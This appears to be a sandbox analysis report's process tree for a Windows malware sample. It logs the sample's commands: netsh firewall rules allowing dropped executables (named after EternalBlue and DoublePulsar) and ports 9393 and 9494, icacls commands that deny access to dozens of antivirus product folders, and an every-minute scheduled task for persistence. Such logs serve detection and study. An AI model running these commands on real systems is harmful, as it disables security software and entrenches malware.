- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2716
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes2⤵PID:2056
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes2⤵PID:2456
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4796
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes2⤵PID:1528
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3944
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes2⤵PID:2012
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3348
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes2⤵PID:1984
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2572
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes2⤵
- System Location Discovery: System Language Discovery
PID:3728 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes2⤵PID:376
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4440
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes2⤵PID:4356
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2488
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN2⤵PID:2960
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4460
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN2⤵PID:2684
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:60
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out2⤵PID:3064
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2208
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out2⤵PID:2896
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)2⤵PID:348
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1452
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4492
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)2⤵
- System Location Discovery: System Language Discovery
PID:2480 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3748
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)2⤵
- System Location Discovery: System Language Discovery
PID:1020 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)2⤵PID:4468
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2332
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2240
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)2⤵PID:3808
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1492
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)2⤵PID:2512
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4208
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)2⤵PID:4812
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4836
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)2⤵PID:2132
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2440
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)2⤵PID:5104
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2664
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:5056
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)2⤵PID:1628
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2072
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)2⤵PID:2904
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:420
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)2⤵
- System Location Discovery: System Language Discovery
PID:2984 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4412
-
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:424
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)2⤵PID:3512
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4408
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)3⤵
- Process spawned unexpected child process
- Modifies file permissions
PID:1396
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)2⤵PID:4120
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2712
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)2⤵
- System Location Discovery: System Language Discovery
PID:2836 -
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2772
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)2⤵PID:2616
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2000
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1316
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)2⤵PID:2964
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3064
-
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny Admin:(F)3⤵
- Modifies file permissions
PID:2956
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)2⤵PID:3332
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4876
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)2⤵PID:1844
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny Admin:(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:3416
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)2⤵PID:3660
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:1816
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)2⤵PID:4184
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3432
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)2⤵PID:1960
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1084
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)2⤵PID:1200
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2576
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)2⤵PID:5012
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3212
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)2⤵PID:2928
-
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:424
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)2⤵PID:2924
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4688
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4412
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)2⤵
- System Location Discovery: System Language Discovery
PID:2456 -
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2616
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)2⤵PID:2144
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2092
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)2⤵PID:4120
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4492
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)2⤵
- System Location Discovery: System Language Discovery
PID:3076 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:1860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)2⤵PID:4704
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1492
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)2⤵
- System Location Discovery: System Language Discovery
PID:3888 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:5060
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)2⤵PID:4680
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:5056
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)2⤵PID:4412
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:64
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)2⤵PID:4724
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2108
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)2⤵PID:2544
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2440
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)2⤵PID:1976
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4828
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)2⤵PID:4900
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2004
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)2⤵PID:2232
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3752
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)2⤵PID:1900
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2996
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:3000
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)2⤵PID:4412
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:3684
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)2⤵PID:3212
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3432
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵PID:2860
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1076
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1732
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)2⤵
- System Location Discovery: System Language Discovery
PID:3064 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4836
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)2⤵PID:2752
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1180
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)2⤵PID:2512
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3728
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵PID:1732
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2576
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)2⤵
- System Location Discovery: System Language Discovery
PID:2940 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:5112
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵PID:2976
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3748
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)2⤵PID:3180
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4876
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)2⤵PID:2540
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4776
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)2⤵PID:3728
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1976
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:328
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)2⤵PID:2576
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)2⤵
- System Location Discovery: System Language Discovery
PID:3424 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2032
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2232
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)2⤵PID:3676
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2976
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)2⤵PID:4996
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2132
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3364
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)2⤵PID:188
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)2⤵PID:3888
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)2⤵PID:4048
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4080
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4264
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)2⤵PID:3612
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1076
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)2⤵PID:1200
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1708
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)2⤵PID:2996
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2964
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 12⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2368 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:188
-
-
